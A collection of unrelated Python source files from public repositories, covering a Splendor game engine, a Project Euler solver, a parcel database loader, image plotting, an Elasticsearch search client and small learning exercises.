if len(self._tier1_deck)!= 0:
new_card = self._tier1_deck.pop()
return new_card
else:
return None
elif tier == 2:
if len(self._tier2_deck)!= 0:
new_card = self._tier2_deck.pop()
return new_card
else:
return None
elif tier == 3:
if len(self._tier3_deck)!= 0:
new_card = self._tier3_deck.pop()
return new_card
else:
return None
else:
raise ValueError
"""
Removes a card from the cards available to purchase from a specific tier.
tier: Int. The tier from which the card should be removed.
If tier = 1, remove from tier 1. If tier = 2, remove from tier 2. If tier = 3,
remove from tier 3. Otherwise the method raises ValueError.
card: Card object. The card that should be removed from the board.
"""
def remove_tier_card(self, tier, card):
if tier == 1:
del self._tier1[card]
elif tier == 2:
del self._tier2[card]
elif tier == 3:
del self._tier3[card]
else:
raise ValueError
"""
Removes gems from the game's available gems.
gem_lst: list of ints representing the number of gems of each color to remove. The order of the list is
[red, blue, green, white, black]. For example, [0, 1, 3, 0, 2] would representing removing
0 red gems, 1 blue gem, 3 green gems, 0 white gems, and 2 black gems.
"""
def remove_gems(self, gem_lst):
self._available_gems.remove(Color.WHITE, gem_lst[0])
self._available_gems.remove(Color.BLACK, gem_lst[1])
self._available_gems.remove(Color.GREEN, gem_lst[2])
self._available_gems.remove(Color.RED, gem_lst[3])
self._available_gems.remove(Color.BLUE, gem_lst[4])
"""
Adds gems to the game's available gems.
gem_lst: list of ints representing the number of gems of each color to add. The order of the list is
[red, blue, green, white, black]. For example, [0, 1, 3, 0, 2] would representing adding
0 red gems, 1 blue gem, 3 green gems, 0 white gems, and 2 black gems.
"""
def add_gems(self, gem_lst):
self._available_gems.add(Color.WHITE, gem_lst[0])
self._available_gems.add(Color.BLACK, gem_lst[1])
self._available_gems.add(Color.GREEN, gem_lst[2])
self._available_gems.add(Color.RED, gem_lst[3])
self._available_gems.add(Color.BLUE, gem_lst[4])
"""
Removes the given noble from the game's available nobles.
noble: GemDict object. The noble to be removed from the board.
"""
def remove_noble(self, noble):
self._nobles.remove(noble)
"""
Returns the card for the tier and card index specified, or None if it DNE.
"""
def getTierCard(self, tier, card):
c = None
if (tier == 1):
c = self._tier1[card]
elif (tier == 2):
c = self._tier2[card]
elif (tier == 3):
c = self._tier3[card]
return c
"""
Decrements the game's total number of available gold gems by 1.
"""
def decr_gold(self):
self._gold -= 1
"""
Increments the game's total number of available gold gems by 1.
"""
def incr_gold(self):
self._gold += 1
"""
Returns True if the current player is discarding cards.
"""
def get_discarding(self):
return self._discarding
"""
Sets _discarding to dis.
"""
def set_discarding(self, dis):
self._discarding = dis
"""
Returns None if nobody has won; else, a player's name.
"""
def get_firstWinner(self):
return self._firstWinner
"""
Sets _firstWinner to fw.
"""
def set_firstWinner(self, fw):
self._firstWinner = fw
"""
Sets _winners to empty list of winners.
"""
def reset_winners(self):
self._winners = []
"""
Returns list of winners.
"""
def get_winners(self):
return self._winners
"""
Returns winners message.
"""
def get_winners_text(self):
text = ""
if (len(self._winners) == 0):
return "Nobody won... [1000 Turn Limit]"
if (len(self._winners) == 1):
text = "" + self._winners[0] + " Wins!"
elif (len(self._winners) > 1):
for w in self._winners[:-2]:
text += w + ", "
text += self._winners[-2] + " and " + self._winners[-1] + " Win!"
else:
return ""
return text
"""
Add w to _winners.
"""
def add_winner(self, w):
self._winners.append(w)
"""
Adds a player to the game's player list.
player: Player object. The player to be added to the player list. The player is added to
the end of the list (will have the last turn).
"""
def add_player(self, player):
self._players.append(player)
def can_buy_card(self, t, c, r):
card = None
if (r):
card = self._players[t].get_reserved()[c]
else:
if (t == 1):
card = self._tier1[c]
elif (t == 2):
card = self._tier2[c]
elif (t == 3):
card = self._tier3[c]
difference = 0
player = self._current_player
keys = card.get_cost().get_data()
discounts = player.get_discounts().get_data()
adjusted_cost = [0] * 5
#Check if user has enough gems to buy card (adjusted with discounts)
for color in keys:
card_cost = max(keys[color] - discounts[color], 0)
adjusted_cost[color.value] = card_cost
if card_cost < 0:
card_cost = 0
player_cash = player.get_gems().get_data()[color]
if card_cost > player_cash:
difference += card_cost - player_cash
if difference > player.get_gold():
return False
return True
def toList(self):
p = []
i = 0
for pl in self._players:
rsv = []
k = 0
for r in pl.get_reserved():
res = [0] * 5
res[r.get_color().value] = 1
rsv += [r.get_points()] + res + r.get_cost().data_gui()
k += 1
for j in range(3-k):
rsv += [0] * 11
p += rsv + [22-pl.get_points()] + pl.get_colors() + pl.get_discounts().data_gui()
i += 1
for j in range(4-i):
p += [0] * 45
g = [self._gold] + self._available_gems.data_gui()
td = [len(self._tier1_deck)] + [len(self._tier2_deck)] + [len(self._tier3_deck)]
nb = []
i = 0
for n in self._nobles:
nb += n.data_gui()
i += 1
for j in range(5-i):
nb += [0] * 5
t1 = []
i = 0
for t in self._tier1:
res = [0] * 5
res[t.get_color().value] = 1
t1 += [t.get_points()] + res + t.get_cost().data_gui()
i += 1
for j in range(4-i):
t1 += [0] * 11
t2 = []
i = 0
for t in self._tier2:
res = [0] * 5
res[t.get_color().value] = 1
t2 += [t.get_points()] + res + t.get_cost().data_gui()
i += 1
for j in range(4-i):
t2 += [0] * 11
t3 = []
i = 0
for t in self._tier3:
res = [0] * 5
res[t.get_color().value] = 1
t3 += [t.get_points()] + res + t.get_cost().data_gui()
i += 1
for j in range(4-i):
t3 += [0] * 11
return (p + g + td + nb + t1 + t2 + t3)
def incr_interactions(self):
self._interactions += 1
def get_interactions(self):
return self._interactions
def input_info(self, stepsLeft):
pturn = [0] * 4
pind = self.current_player_index()
pturn[pind] = 1
return (self.toList() + self.possible_moves(pind) +
pturn + [stepsLeft])
"""
Returns all the possible moves in this state.
Indexes [0...4] for whether it's possible to take at least one of the gem.
Indexes [5...9] for whether it's possible to take at two of the gem.
Indexes [10...24] for whether a card can be reserved; R-to-L, Tier 1 -> 3.
Indexes [25...27] for whether a reserved card can be bought.
Indexes [28...39] for whether a tier card can be bought; Tier 1 -> 3.
Indexes [40...45] for whether the player can discard one of their colors.
"""
def possible_moves(self, cpind):
gm = self.get_avail_gems().data_gui()
cp = self.get_players()[cpind]
canTake1 = [0] * 5
canTake2 = [0] * 5
canReserve = [0] * 15
canBuy = [0] * 15
canDiscard = [0] * 6
if (not self.get_discarding()):
canTake1 = list(map(lambda n : int(n>0), gm))
canTake2 = list(map(lambda n : int(n>3), gm))
if (len(cp.get_reserved()) < 3):
canReserve[0] = int(len(self.get_tier1_deck()) > 0)
canReserve[5] = int(len(self.get_tier2_deck()) > 0)
canReserve[10] = int(len(self.get_tier3_deck()) > 0)
for i in range(len(self.get_tier1())):
canReserve[i+1] = 1
for i in range(len(self.get_tier2())):
canReserve[i+6] = 1
for i in range(len(self.get_tier3())):
canReserve[i+11] = 1
for r in range(len(cp.get_reserved())):
canBuy[r] = int(self.can_buy_card(cpind, r, True))
for t1 in range(len(self.get_tier1())):
canBuy[t1+3] = int(self.can_buy_card(1, t1, False))
for t2 in range(len(self.get_tier2())):
canBuy[t2+7] = int(self.can_buy_card(2, t2, False))
for t3 in range(len(self.get_tier3())):
canBuy[t3+11] = int(self.can_buy_card(3, t3, False))
else:
canDiscard = list(map(lambda n : int(n>0), cp.get_colors()))
return (canTake1 + canTake2 + canReserve + canBuy + canDiscard)
"""
A Card will contain:
color: a Color indicating the discount the card gives
points: an int indicating the number of points the card gives
cost: A GemDict indicating the cost of the card
"""
class Card:
"""
cost_lst: a list of the number of each color of gem that the card costs [red, blue, green, white, black].
For example, [0, 1, 3, 0, 2] would representing the card costing
0 red gems, 1 blue gem, 3 green gems, 0 white gems, and 2 black gems.
"""
def __init__(self, color, points, cost_lst, tier):
self._color = color
self._points = points
self._cost = GemDict(cost_lst)
self._tier = tier
self._reserved = [False, None]
"""Returns the Color indicated the discount the card gives."""
def get_color(self):
return self._color
"""Returns the point value of the card."""
def get_points(self):
return self._points
"""Returns the cost of the card as a Gem Dict."""
def get_cost(self):
return self._cost
"""Returns the tier of the card. One of [1,2,3]."""
def get_tier(self):
return self._tier
"""Returns boolean for whether the card is reserved."""
def reserved(self):
return self._reserved
"""Returns [True, index], where index is the index in its reserve pile."""
def reserve(self, index):
self._reserved = [True, index]
def __str__(self):
return ( str(self._points) + " " + str(self._color) +
"\n\n\n" + "W|K|E|R|B\n" +
str(self.get_cost()) )
"""
A Player will contain:
name: a string representing the name of the player. ex. HUMAN 0 for human player, AI 0 for AI player.
discounts: A GemDict with Color keys and int values. Represents the number of cards of each color a player has.
gems: A GemDict with with Color keys and int values. Represents the number of gems of each color a player has.
gold: an int representing the number of gold gems a player has
reserved: A list of Card objects that the player has reserved
points: The number of points a player has
player_type: A PlayerType indicating whether the player is AI or human
num_cards: An int indicating the number of cards a player has bought (used for end-game tiebreaker).
num_moves: Number of moves the player has taken
gems_taken: list of gem colors in the order that the player took them (only used for AI)
"""
class Player:
"""
Sets up an empty Player object with each of the attributes described above.
"""
def __init__(self, player_type, name):
self._name = name
self._discounts = GemDict([0,0,0,0,0])
self._gems = GemDict([0,0,0,0,0])
self._gold = 0
self._reserved = []
self._points = 0
self._player_type = player_type
self._num_cards = 0
self._num_moves = 0
self._gems_taken = []
self._move_dict = {'take_two' : 0, 'take_three' : 0, 'buy' : 0, 'buy_noble' : 0, 'reserve' : 0, 'reserve_top': 0, 'discard' : 0}
def get_move_dict(self):
return self._move_dict
def add_move_dict(self, move):
self._move_dict[move] += 1
"""
Returns the type of this player.
"""
def get_player_type(self):
return self._player_type
"""
Returns the name of the current player.
"""
def get_name(self):
return self._name
"""
Returns the player's discounts as a GemDict which represents the number of cards of each color a player has.
"""
def get_discounts(self):
return self._discounts
"""
Returns the number of gems of each color the player has.
"""
def get_gems(self):
return self._gems
"""
Returns the number of gold gems a player has.
"""
def get_gold(self):
return self._gold
"""
Returns a list of Card objects the player has reserved.
"""
def get_reserved(self):
return self._reserved
"""
Returns the number of points the player has.
"""
def get_points(self):
return self._points
"""
Returns number of cards the player has bought.
"""
def get_purchased(self):
return self._num_cards
"""
Returns number of cards the player has bought.
"""
def gemGoldAmt(self):
return self._gems.total_gems() + self._gold
"""
Returns the list of all the colors the player owns.
"""
def get_colors(self):
return [self._gold] + self._gems.data_gui()
"""
Increments the player's number of gold gems by 1.
"""
def incr_gold(self):
self._gold += 1
"""
Decrements the player's number of gold gems by 1.
"""
def decr_gold(self):
self._gold -= 1
"""
Adds card to the player's list of reserved cards.
"""
def add_reserved(self, card):
self._reserved.append(card)
card.reserve(self._reserved.index(card))
"""
Removes card from the player's list of reserved cards.
"""
def remove_reserved(self, card):
del self._reserved[card]
"""
Adds the color to the player's discounts.
"""
def set_discount(self, color):
self._discounts.add(color, 1)
"""
Adds the given number of gems in color_lst to the player's total gems. color_lst is a list
of ints representing the number of gems of each color to be added. The order of color_lst is
[red, blue, green, white, black]. For example, [0, 1, 3, 0, 2] would representing adding
0 red gems, 1 blue gem, 3 green gems, 0 white gems, and 2 black gems.
"""
def add_gems(self, color_lst):
self._gems.add(Color.WHITE, color_lst[0])
self._gems.add(Color.BLACK, color_lst[1])
self._gems.add(Color.GREEN, color_lst[2])
self._gems.add(Color.RED, color_lst[3])
self._gems.add(Color.BLUE, color_lst[4])
"""
Removes the given number of gems in color_lst from the player's total gems. color_lst is a list
of ints representing the number of gems of each color to be added. The order of color_lst is
[red, blue, green, white, black]. For example, [0, 1, 3, 0, 2] would representing removing
0 red gems, 1 blue gem, 3 green gems, 0 white gems, and 2 black gems.
"""
def remove_gems(self, color_lst):
self._gems.remove(Color.WHITE, color_lst[0])
self._gems.remove(Color.BLACK, color_lst[1])
self._gems.remove(Color.GREEN, color_lst[2])
self._gems.remove(Color.RED, color_lst[3])
self._gems.remove(Color.BLUE, color_lst[4])
def ai_remove_gems(self, color_lst):
if self._player_type == 2: #use only for AI
for i in range(len(color_lst)):
for j in range(color_lst[i]):
if i == 0:
self._gems_taken.remove(Color.WHITE)
elif i == 1:
self._gems_taken.remove(Color.BLACK)
elif i == 2:
self._gems_taken.remove(Color.GREEN)
elif i == 3:
self._gems_taken.remove(Color.RED)
elif i == 4:
self._gems_taken.remove(Color.BLUE)
"""
Returns list of gems that the player took in the order they took them
"""
def get_gems_ordered(self):
return self._gems_taken
"""
Takes a list of Colors and adds them to the front of the list of gems that have
already been taken
"""
def ai_add_gems(self, color_lst):
color_lst + self._gems_taken
"""
Adds the given number of points to the player's point total.
"""
def set_points(self, num_points):
self._points += num_points
"""
Increments the player's number of purchased cards by 1.
"""
def incr_card_total(self):
self._num_cards += 1
"""
Returns the player's number of moves so far, not including this current one.
"""
def get_num_moves(self):
return self._num_moves
"""
Increments the player's number of moves by 1.
"""
def incr_num_moves(self):
self._num_moves += 1
def __str__(self):
gd = self._gold
gm = self._gems
dc = self._discounts
return (
str(self._points) + " " + self._name + "\n\n\n" +
" G " + "W|K|E|R|B\n" +
"GEMS " + str(gd) + " " + str(gm) + "\n" +
"CARDS " + str(dc) + "\n" +
"_______________________\n" +
"TOTAL " + str(gd) + " " + gm.addGD(dc)
) | ckpalma/splendor-ai | gym-master/gym/envs/splendor/structure.py | structure.py | py | 36,935 | python | en | code | 0 | github-code | 36 |
20349694789 | import time
"""
By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.
What is the 10 001st prime number?
"""
# Check if a number is prime
def is_prime(n):
if n <= 1:
return False
if n == 2:
return True
if n % 2 == 0:
return False
for i in range(3, int(n / 2) + 1, 2):
if n % i == 0:
return False
return True
def main():
start = time.time()
n = 10001
prime_number = 13
count = 6
while count < n:
prime_number += 2
if is_prime(prime_number):
count += 1
print("10001st prime number: " + str(prime_number))
finish = time.time()
print("Execution time : " + str(finish - start))
if __name__ == "__main__":
main()
| dorinzaharia/project-Euler-solutions | 007/007.py | 007.py | py | 796 | python | en | code | 0 | github-code | 36 |
22163631798 | #!/usr/bin/env python
import csv
import gzip
import json
import os
import re
import sys
import pathlib
import sqlite3
from shapely.geometry import Polygon
from sqlite3 import Error
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
DATA_DIR = os.path.join(SCRIPT_DIR, os.path.join('..', '..', 'outputs', 'butte'))
GEOJSON_FILE = os.path.join(DATA_DIR, 'butte_parcels.geojson')
sql_create_parcel_table = """
CREATE TABLE IF NOT EXISTS parcels (
apn TEXT PRIMARY KEY, -- county specific id for parcel lookup
location TEXT NOT NULL, -- the address or geographical description of parcel
zipcode TEXT NOT NULL, -- the zipcode of the parcel
geo_lat NUMERIC, -- the latitude of the property centroid
geo_lon NUMERIC, -- the longitude of the property centroid
use_code TEXT, -- property use code
lot_size_sqft NUMERIC, -- the lot size in square feet
building_size_sqft NUMERIC, -- the building size in square feet
building_bed_count NUMERIC, -- the number of bedrooms in building
building_bath_count NUMERIC, -- the number of bathrooms in building
building_stories_count NUMERIC, -- the number of stories in building
building_units_count NUMERIC, -- the number of units in building
building_age NUMERIC, -- the year building is built
tax_value NUMERIC -- the appicable assessed tax
);
"""
sql_select_apn_from_parsed = """
SELECT EXISTS(SELECT 1 FROM parcels WHERE apn = ?);
"""
sql_insert_parcel_from_parsed = """
INSERT INTO parcels (apn, location, zipcode, geo_lat, geo_lon, use_code, lot_size_sqft, building_size_sqft, building_bed_count, building_bath_count, building_stories_count, building_units_count, building_age)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
"""
flatten=lambda l: sum(map(flatten, l),[]) if isinstance(l,list) else [l]
def run():
conn = None
try:
db_file = os.path.join(DATA_DIR, 'butte_parcel.db')
print('Opening {}'.format(db_file))
conn = sqlite3.connect(db_file)
c = conn.cursor()
c.execute(sql_create_parcel_table)
with open(GEOJSON_FILE) as f_in:
count = 0
for line in f_in:
count += 1
if count < 6:
# Skip geojson cruft left by conversion
continue
try:
json_to_parse = line.strip()
if json_to_parse.endswith(','):
json_to_parse = json_to_parse[:-1]
record = json.loads(json_to_parse)
except:
print('-> could not parse JSON on line %d' % (count,))
continue
props = record['properties']
formatted_apn = props['SiteAPN']
if not formatted_apn:
continue
if not record['geometry'] or not record['geometry']['coordinates']:
print('-> skip')
continue
# There is definitely a more correct way to do this.
flat_coords = [[xyz[0], xyz[1]] for coords in record['geometry']['coordinates'] for xyz in coords]
flat_coords = flatten(flat_coords)
coords = zip(flat_coords[0::2], flat_coords[1::2])
try:
centroid = list(Polygon(coords).centroid.coords)[0]
except:
print('-> could not find centroid')
continue
# check if id already exists
c.execute(sql_select_apn_from_parsed, (formatted_apn,))
(existsCheck,) = c.fetchone()
if existsCheck > 0:
continue
if not props['SiteZip']:
continue
insert_record = (
formatted_apn,
'{}\n{}'.format(props['SiteAddr'], props['SiteCity']),
props['SiteZip'],
centroid[1],
centroid[0],
props['UseCode'],
props['LotSizeSF'],
props['BuildingSF'],
props['Bedrooms'],
props['Bathrooms'],
props['Stories'],
props['Units'],
props['YrBuilt']
)
c.execute(sql_insert_parcel_from_parsed, insert_record)
conn.commit()
print("inserts: {}".format(c.lastrowid))
except Error as e:
print(e)
finally:
if conn:
conn.close()
if __name__ == '__main__':
run()
| typpo/ca-property-tax | scrapers/butte/create_parcels_db.py | create_parcels_db.py | py | 4,941 | python | en | code | 89 | github-code | 36 |
5668664706 | from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import numpy as np
import sklearn.metrics as metrics
import seaborn as sns
from mosaic import features
from mosaic import contexts
from mosaic import image_io
from mosaic import plots
from mosaic import data_utils
from mosaic.grid.image_grid import images_to_grid
__all__ = ['scatter_grid']
def images_to_scatter_grid(images, x_var, y_var, padding=None, **kwargs):
"""Creates a grid plot from a scatter plot.
Parameters
----------
images : list of length [n_samples,]
A List of PIL Image objects. All images must be
the same shape NxWx3.
x_var : np.array of shape [n_samples,]
The x-coordinate in euclidean space.
y_var : np.array of shape [n_samples,]
The y-coordinate in euclidean space.
padding : int, optional
The padding between images in the grid.
Returns
-------
A properly shaped width x height x 3 PIL Image.
"""
# scale the variables between 0-1 (subtract off min?)
features.minmax_scale(x_var)
features.minmax_scale(y_var)
xy = np.c_[x_var, y_var]
# make a grid of evenly spaced points on the grid.
# The grid is of size sqrt(n_samples) x sqrt(n_samples)
grid_size = int(np.ceil(np.sqrt(len(images))))
grid_1d = np.linspace(0, 1, grid_size)
grid_2d = np.dstack(np.meshgrid(grid_1d, grid_1d)).reshape(-1, 2)
# distances between the evenly spaced grid and the points
dist = metrics.euclidean_distances(grid_2d, xy)
# determine order based on nearest neighbors
image_order = []
for i in range(grid_2d.shape[0]):
index = np.argmin(dist[i, :])
image_order.append(index)
dist[:, index] = np.inf # set to inf so we don't pick this point again
images = [images[index] for index in image_order]
grid = images_to_grid(images, padding=padding)
return plots.pillow_to_matplotlib(grid, **kwargs)
def scatter_grid(x, y,
images=None,
data=None,
hue=None,
image_dir='',
image_size=None,
padding=None,
n_jobs=1,
**kwargs):
"""Draw a plot ordering images in a regularly spaced 2-d grid
based on their distance in the x-y plane. The distance between
points is assumed to be euclidean.
Parameters
----------
x, y : str or array-like
Data or names of variables in `data`.
These variables correspond to the x-y coordinates
in the euclidean space.
images : str or array-like
Image arrays or names of the column pointing to the
image paths within `data`.
data : pd.DataFrame
Pandas dataframe holding the dataset.
hue : str or array-like
Data or the name of the variable to use to color
the individual images on the grid.
image_dir : str (default='')
The location of the image files on disk.
image_size : int
The size of each image in the scatter plot.
padding : int, optional
The padding between images in the grid.
n_jobs : int (default=1)
The number of parallel workers to use for loading
the image files.
Returns
-------
A properly shaped NxWx3 image with any necessary padding.
Examples
--------
Create a grid plot with hue labels.
.. plot:: ../examples/scatter_grid.py
"""
x_var = data_utils.get_variable(data, x)
y_var = data_utils.get_variable(data, y)
# TODO (seaborn is only required for a color palette. Remove this)
if hue is not None:
images = data_utils.get_images(
data, images,
image_dir=image_dir,
as_image=False,
image_size=image_size,
n_jobs=n_jobs)
hue = data_utils.get_variable(data, hue)
values, value_map = np.unique(hue, return_inverse=True)
palette = sns.husl_palette(len(values))
images = [features.color_image(img, hue=palette[val]) for
img, val in zip(images, value_map)]
images = [image_io.to_pillow_image(img) for img in images]
else:
# load images
images = data_utils.get_images(
data, images,
image_dir=image_dir,
as_image=True,
image_size=image_size,
n_jobs=n_jobs)
return images_to_scatter_grid(images, x_var, y_var, padding=padding, **kwargs)
| joshloyal/Mosaic | mosaic/grid/scatter_grid.py | scatter_grid.py | py | 4,542 | python | en | code | 0 | github-code | 36 |
43471363833 | import pandas as pd
import numpy as np
# from sklearn.linear_model import LogisticRegression
# from omegaconf import DictConfig, OmegaConf
from loguru import logger
import joblib
import click
# from dataclasses import dataclass
# from hydra.core.config_store import ConfigStore
# from sklearn.pipeline import Pipeline
# from src.features.transformers import SqrTransformer
# from omegaconf import DictConfig, OmegaConf, MISSING
# from src.models.train_model import Config, RF, LogReg, ModelType
@click.command()
@click.option(
"--model",
help="Pretrained model path.",
type=click.Path(exists=True),
required=True,
)
@click.option(
"--dataset",
help="Input dataset in csv format.",
type=click.Path(exists=True),
required=True,
)
@click.option(
"--output",
help="Output file with predicted labels.",
type=click.Path(),
required=True,
)
def main(model: str, dataset: str, output: str) -> None:
logger.info('Reading data')
df = pd.read_csv(dataset)
if 'condition' in df.columns:
df = df.drop(['condition'], axis=1)
# with open(model, 'rb') as file:
# model = pickle.load(file)
# logger.info('Model loaded')
model = joblib.load(model)
y_pred = model.predict(df)
logger.info('Saving results')
np.savetxt(output, y_pred, delimiter=",")
if __name__ == "__main__":
main()
| made-mlops-2022/mlops-andrey-talyzin | ml_project/src/models/predict_model.py | predict_model.py | py | 1,397 | python | en | code | 0 | github-code | 36 |
38591539805 | from elasticsearch import Elasticsearch
from search import search_user_query
class ESClient:
def __init__(self):
self.es = Elasticsearch("http://localhost:9200")
def extract_songs(self, resp):
songs = []
hits = resp["hits"]["hits"]
for i in range(len(hits)):
songs.append(hits[i]["_source"])
return songs
def get_all_songs(self):
resp = self.es.search(index="sinhala-songs-corpus", body={"query": {"match_all": {}}})
return self.extract_songs(resp)
def advanced_search(self, req_body):
filled_keys = {k: v for k, v in req_body.items() if v}
must_list = []
for k in filled_keys.keys():
must_list.append({ "match" : { k+".case_insensitive_and_inflections" : req_body[k] } })
resp = self.es.search(index="sinhala-songs-corpus",body={"query": {"bool": {"must": must_list}}})
return self.extract_songs(resp)
def get_logical_combinations(self, req_body):
resp = None
if req_body["operation"] == "and":
resp = self.es.search(index="sinhala-songs-corpus",body={
"query": {
"bool": {
"must": [
{ "match" : { req_body["key1"]+".case_insensitive_and_inflections" : req_body["value1"] } },
{ "match" : { req_body["key2"]+".case_insensitive_and_inflections" : req_body["value2"] } }
]
}
}
})
elif req_body["operation"] == "or":
resp = self.es.search(index="sinhala-songs-corpus",body={
"query": {
"bool": {
"should": [
{ "match" : { req_body["key1"]+".case_insensitive_and_inflections" : req_body["value1"] } },
{ "match" : { req_body["key2"]+".case_insensitive_and_inflections" : req_body["value2"] } }
]
}
}
})
elif req_body["operation"] == "not":
resp = self.es.search(index="sinhala-songs-corpus",body={
"query": {
"bool": {
"must" : {
"match" : { req_body["key1"]+".case_insensitive_and_inflections" : req_body["value1"] }
},
"must_not" : {
"match" : { req_body["key2"]+".case_insensitive_and_inflections" : req_body["value2"] }
}
}
}
})
return self.extract_songs(resp)
def regular_search(self, req_body):
resp = search_user_query(req_body["query"], self.es)
return self.extract_songs(resp) | PasinduUd/metaphor-based-search-engine | API/es_client.py | es_client.py | py | 2,414 | python | en | code | 0 | github-code | 36 |
16146023785 | import datetime as dt
f = open("def.dat", "r")
CLAIM_NUM = int(f.readline())
HST_RATE = float(f.readline)
CURR_DATE = dt.datetime.now()
f.close()
while True:
emp_name = input("Employee name: ")
emp_num = input("Employee number: ")
location = input("Location: ")
start_date = "2023-11-06"
end_date = "2023-11-09"
num_days = 3
car_status = "O"
num_km = 0
if car_status == "O":
num_km = 1400
if num_days <= 3:
per_diem = num_days * 85.00
else:
per_diem = num_days * 100.00
if car_status == "O":
mileage = num_km * 0.10
else:
mileage = num_days * 56.00
claim_amt = per_diem + mileage
taxes = claim_amt * HST_RATE
claim_total = claim_amt + taxes
print(f"Claim num: {CLAIM_NUM}")
print(f"Employee num: {emp_num}")
print(f"Employee name: {emp_name}")
print(f"Location: {location}")
print(f"Claim total: ${claim_total}")
# write data to a file called claims.dat
f = open("claims.dat", "a") # a for append
f.write(f"{CLAIM_NUM}, ")
f.write(f"{str(CURR_DATE)}, ")
f.write(f"{num_days}\n")
CLAIM_NUM += 1
print("Claim data written.")
cont = input("Continue?: ").upper()
if cont == "N":
break
f = open("def.dat", "w")
f.write(f"{CLAIM_NUM}\n")
f.write(f"{HST_RATE}\n")
f.close()
print("Thank you for using the claim processing program.")
| sweetboymusik/Python | Lesson 29/question.py | question.py | py | 1,411 | python | en | code | 0 | github-code | 36 |
15853176936 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import warnings
import unittest
from collections import OrderedDict
from w3lib.form import encode_multipart
class EncodeMultipartTest(unittest.TestCase):
def test_encode_multipart(self):
data = {'key': 'value'}
with warnings.catch_warnings(record=True):
body, boundary = encode_multipart(data)
expected_body = (
'\r\n--{boundary}'
'\r\nContent-Disposition: form-data; name="key"\r\n'
'\r\nvalue'
'\r\n--{boundary}--'
'\r\n'.format(boundary=boundary).encode('utf8')
)
self.assertEqual(body, expected_body)
def test_encode_multipart_unicode(self):
data = OrderedDict([
(u'ключ1', u'значение1'.encode('utf8')),
(u'ключ2', u'значение2'),
])
with warnings.catch_warnings(record=True):
body, boundary = encode_multipart(data)
expected_body = (
u'\r\n--{boundary}'
u'\r\nContent-Disposition: form-data; name="ключ1"\r\n'
u'\r\nзначение1'
u'\r\n--{boundary}'
u'\r\nContent-Disposition: form-data; name="ключ2"\r\n'
u'\r\nзначение2'
u'\r\n--{boundary}--'
u'\r\n'.format(boundary=boundary).encode('utf8')
)
self.assertEqual(body, expected_body)
def test_encode_multipart_file(self):
# this data is not decodable using utf8
data = {'key': ('file/name', b'\xa1\xa2\xa3\xa4\r\n\r')}
with warnings.catch_warnings(record=True):
body, boundary = encode_multipart(data)
body_lines = [
b'\r\n--' + boundary.encode('ascii'),
b'\r\nContent-Disposition: form-data; name="key"; filename="file/name"\r\n',
b'\r\n\xa1\xa2\xa3\xa4\r\n\r',
b'\r\n--' + boundary.encode('ascii') + b'--\r\n',
]
expected_body = b''.join(body_lines)
self.assertEqual(body, expected_body)
#def test_encode_multipart_int(self):
# data = {'key': 123}
# body, boundary = encode_multipart2(data)
# expected_body = (
# '\n--{boundary}'
# '\nContent-Disposition: form-data; name="key"\n'
# '\n123'
# '\n--{boundary}--'
# '\n'.format(boundary=boundary)
# )
# self.assertEqual(body, expected_body)
| bertucho/epic-movie-quotes-quiz | dialogos/build/w3lib/tests/test_form.py | test_form.py | py | 2,473 | python | en | code | 0 | github-code | 36 |
3458958897 |
class Solution(object):
def majorityElement(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
length = int(len(nums) / 2)
data = {}
for ele in nums:
data[ele] = data.get(ele, 0) + 1
if data[ele] > length :
return ele
if __name__ == '__main__':
nums = [1, 2, 3, 2, 2, 2, 5, 4, 2]
print( Solution().majorityElement(nums) ) | pi408637535/Algorithm | com/study/algorithm/offer/剑指 Offer 39. 数组中出现次数超过一半的数字.py | 剑指 Offer 39. 数组中出现次数超过一半的数字.py | py | 438 | python | en | code | 1 | github-code | 36 |
28451867185 | from rest_framework import serializers
from core.models import Tag,Ingredient
class TagSerializers(serializers.ModelSerializer):
'''serializer for the object'''
class Meta:
model = Tag
fields = ('id', 'name')
read_only_fields = ('id',)
class IngredientSerializer(serializers.ModelSerializer):
'''serializers for ingredient objects'''
class Meta:
model = Ingredient
fields = ('id','name')
read_only_fields = ('id',) | Manu1John/recipe-app-api | app/recipe/serializers.py | serializers.py | py | 486 | python | en | code | 0 | github-code | 36 |
31287697468 | prompt="enter your pizza toppings: "
#exercise 7-4 & 7-6 P1 :
#x=""
#while x != "quit":
#x=input(prompt)
#if x == "quit":
#print("thank you for ordering")
#else:
#print(x)
#exercise 7-6 P2:
#active = True
#while active:
#x=input(prompt)
#if (x == "quit"):
#print("thank you for ordering")
#active = False
#else:
#print(x)
#exercise 7-6 P3:
while True:
x=input(prompt)
if (x=="quit"):
print("thank you for ordering")
break
else:
print(x)
| BasselMalek/python-training-files | python_learning_projects/7_4_6_exercise.py | 7_4_6_exercise.py | py | 565 | python | en | code | 0 | github-code | 36 |
35127026935 | import os
import numpy as np
import pickle
from dataclasses import dataclass
import itertools
from multiprocessing import Pool
import PIL
from noise_reducers.grayscale_gibbs_noise_reducer import GrayscaleGibbsNoiseReducer
from noise_reducers.grayscale_gradient_noise_reducer import GrayscaleGradientNoiseReducer
from noise_reducers import image_utils
@dataclass
class Experiment(object):
experiment_name: str
noise_level: float
EXPERIMENTS = [
Experiment(experiment_name="size800_noise10_flipped", noise_level=0.1),
Experiment(experiment_name="size800_noise20_flipped", noise_level=0.2),
]
IMAGES_PATH = "../grayscale_images"
IMAGES_PER_EXPERIMENT = 20
ITERATIONS_PER_EXPERIMENT = 300_000
ITERATIONS_PER_EVALUATION = 6000
@dataclass
class ImagePair(object):
image_id: int
ground_truth: np.ndarray
observation: np.ndarray
def get_image_pairs_to_evaluate(experiment_name):
images_path = os.path.join(IMAGES_PATH, experiment_name)
image_pairs = []
for image_id in range(IMAGES_PER_EXPERIMENT):
ground_truth_path = os.path.join(images_path, f"image_{image_id}_ground_truth.png")
observation_path = os.path.join(images_path, f"image_{image_id}_observation.png")
image_pairs.append(ImagePair(
image_id=image_id,
ground_truth=image_utils.load_grayscale_image_as_numpy_array(ground_truth_path),
observation=image_utils.load_grayscale_image_as_numpy_array(observation_path),
))
return image_pairs
def run_with_reducer(reducer, experiment_name, storage_folder):
os.makedirs(storage_folder, exist_ok=True)
for image_pair in get_image_pairs_to_evaluate(experiment_name):
